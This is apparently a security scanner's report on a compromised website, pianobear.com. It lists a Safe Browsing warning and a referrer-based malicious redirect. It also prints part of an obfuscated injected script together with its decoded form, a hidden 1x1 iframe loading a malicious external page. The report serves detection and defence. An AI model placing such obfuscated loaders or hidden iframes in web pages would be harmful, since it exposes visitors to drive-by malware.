Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pianobear.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://pianobear.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pianobear.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:37:56 GMT Location: http://getholidaypresent5.com/go.php?id=2045-10&key=4aaf23a77&d=1 Server: Apache Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://pianobear.com/ | 200 OK Content-Length: 9021 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: sodanthu.com function ZCLTWYUnb(cTFkV){var FdjfKh=2,QuJ=6;var XucjYGqSlM='43-2,58-2,57-2,61-2,55-4,59-4,57-0,34-0,63-0,58-2,56-4,62-0,58-0,43-4,39-4,34-0,58-0,57-0,58-2,57-4,58-0,62-0,43-4,39-4,34-0,56-0,60-2,61-2,56-4,57-0,',JMMPBaqk=XucjYGqSlM.split(',');pjvAatxyL='';function UtjitjXLj(c){return String.fromCharCode(c);}for(MpxsUy=(JMMPBaqk.length-1);MpxsUy>=(0x30+0x25+0x2b-0x80);MpxsUy-=-0x5-0xf-0x2-0x1a+0x1+0xa+0x26){ RSPPmhPq=JMMPBaqk[MpxsUy].split('-');JqP ...[2858 bytes skipped]... Decoded script: <iframe width=1 height=1 border=0 frameborder=0 src='http://sodanthu.com/in6.php'></iframe> | ||
http://pianobear.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 18 Dec 2014 00:37:57 GMT Location: http://getholidaypresent5.com/go.php?id=2045-10&key=4aaf23a77&d=1 Server: Apache Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://getholidaypresent5.com/go.php?id=2045-10&key=4aaf23a77&d=1 | 500 Can't connect to getholidaypresent5.com:80 Content-Length: 197 Content-Type: text/plain | clean |
http://getholidaypresent5.com/test404page.js | 500 Can't connect to getholidaypresent5.com:80 Content-Length: 197 Content-Type: text/plain | clean |